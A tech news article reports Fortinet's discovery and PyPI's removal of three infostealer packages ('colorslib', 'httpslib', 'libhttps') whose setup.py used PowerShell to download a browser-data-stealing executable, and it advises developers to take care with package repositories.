Programmers: look out for these infostealers on the Python Package Index

Magnifying glass enlarging the word 'malware' in computer machine code
(Image credit: Shutterstock)

Three malicious packages carrying infostealers were recently discovered, and subsequently removed, from the PyPI repository.

Researchers from Fortinet found three packages, uploaded between January 7 and 12, by a user named “Lollip0p”. These three are called “colorslib”, “httpslib”, and “libhttps”, and if you’ve used them before, make sure to remove them immediately. 

Usually, cybercriminals looking to compromise Python developer endpoints via PyPI will try typosquatting - giving their malicious packages names almost identical to others belonging to legitimate projects. That way, developers who are either reckless, or in a hurry, might unknowingly use the malicious one, instead of the clean one. 

Stealing browser data

This campaign, however, is different, as these three have unique names. To build trust, the attacker drafted complete descriptions for the packages. While the total download count for these three hardly surpassed 500, it might still prove devastating if it’s a part of a larger supply chain, the publication states.

In all three cases, the attackers are distributing a file called “setup.py” which, after running a PowerShell, tries to download the “Oxyz.exe” executable from the internet. This executable, the researchers are saying, is malicious, and steals browser information. We don’t know exactly what type of information the malware is looking to steal, but infostealers usually go for saved passwords, credit card data, cryptocurrency wallets, and other valuable information.

 The report also found that the detection rate for these executables are relatively low (up to 13.5%), meaning the attackers can successfully siphon out data even from endpoints protected by antivirus solutions. 

While the malicious packages have been removed from PyPI already, nothing is stopping the attackers from simply uploading them with a different name, and from a different account. That being said, the best way to protect against this type of supply chain attack is to be particularly careful when downloading code building blocks from repositories. 

Via: BleepingComputer

TOPICS

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

Read more
An abstract image of digital security.
Hundreds of GitHub repositories hijacked to trick users into downloading malware
Hands typing on a keyboard surrounded by security icons
Infostealers on the rise: the latest concern for organizational defenses
A concept image of someone typing on a computer. A red flashing danger sign is above the keyboard and nymbers and symbols also in glowing red surround it.
North Korean Lazarus hackers launch large-scale cyberattack by cloning open source software
GitHub Webpage
A cracked malicious version of a Go package lay undetected online for years
A digital representation of a lock
Security experts are being targeted with fake malware discoveries
Image depicting a hand on a scanner
New Lazarus Group campaign sees North Korean hackers spreading undetectable malware through GitHub and open source packages
Latest in Software & Services
TinEye website
I like this reverse image search service the most
A person in a wheelchair working at a computer.
Here’s a free way to find long lost relatives and friends
A white woman with long brown hair in a ponytail looks down at her computer in a distressed manner. She is holding her forehead with one hand and a credit card with the other
This people search finder covers all the bases, but it's not perfect
That's Them home page
Is That's Them worth it? My honest review
woman listening to computer
AWS vs Azure: choosing the right platform to maximize your company's investment
A person at a desktop computer working on spreadsheet tables.
Trello vs Jira: which project management solution is best for you?
Latest in News
DeepSeek
Deepseek’s new AI is smarter, faster, cheaper, and a real rival to OpenAI's models
Open AI
OpenAI unveiled image generation for 4o – here's everything you need to know about the ChatGPT upgrade
Apple WWDC 2025 announced
Apple just announced WWDC 2025 starts on June 9, and we'll all be watching the opening event
Hornet swings their weapon in mid air
Hollow Knight: Silksong gets new Steam metadata changes, convincing everyone and their mother that the game is finally releasing this year
OpenAI logo
OpenAI just launched a free ChatGPT bible that will help you master the AI chatbot and Sora
An aerial view of an Instavolt Superhub for charging electric vehicles
Forget gas stations – EV charging Superhubs are using solar power to solve the most annoying thing about electric motoring